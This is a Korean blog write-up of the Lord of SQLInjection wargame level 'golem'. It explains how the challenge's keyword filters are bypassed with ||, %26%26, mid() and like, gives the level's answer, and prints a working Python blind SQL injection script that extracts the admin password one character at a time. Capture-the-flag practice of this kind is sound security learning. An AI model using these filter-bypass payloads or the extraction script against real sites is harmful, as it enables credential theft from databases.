-
LOS - golem / level 11Web/SQLI 2024. 6. 24. 17:09
문제
풀이 방법
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe");pw에 or / and / substr( / = 을 필터링 중이다
or => ||
and => &26&26
substr( => right(left(pw,1),1) or mid(pw,1,1)
= => like
문으로 우회한다
정답
더보기?pw=77d6290b
코드
이번에는 bit masking이 아닌 일반 brute force로 작성된 코드이다.
import requests url = "input your url" cookie = {input your cookie} user = "admin" def find_length(url, cookie, user): i = 1 while True: params = f"?pw=' || id like '{user}' %26%26 length(pw) > {i}%23" print(params) send_url = url + params res = requests.get(send_url, cookies=cookie) if "Hello admin" not in res.text: break i += 1 return i def blind(url, cookie, user, length): str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" result = "" for i in range(1, length+1): for k in range(len(str)): print(f"{str[k]}", end=" ", flush=True) params = f"?pw=' || id like '{user}' %26%26 mid(pw,{i},1) like %27{str[k]}%27%23" # print(params) send_url = url + params res = requests.get(send_url, cookies=cookie) if "Hello admin" in res.text: result = result + str[k] break print(f"\n{i} : {result}") return result length = find_length(url, cookie, user) print(f"Length : {length}") result_str = blind(url, cookie, user, length) print(result_str)'Web > SQLI' 카테고리의 다른 글
LOS - bugbear / level 13 (0) 2024.06.29 LOS - darknight / level 12 (0) 2024.06.24 LOS - skeleton / level 10 (0) 2024.06.23 LOS - vampire / level 9 (0) 2024.06.23 LOS - troll / level 8 (0) 2024.06.23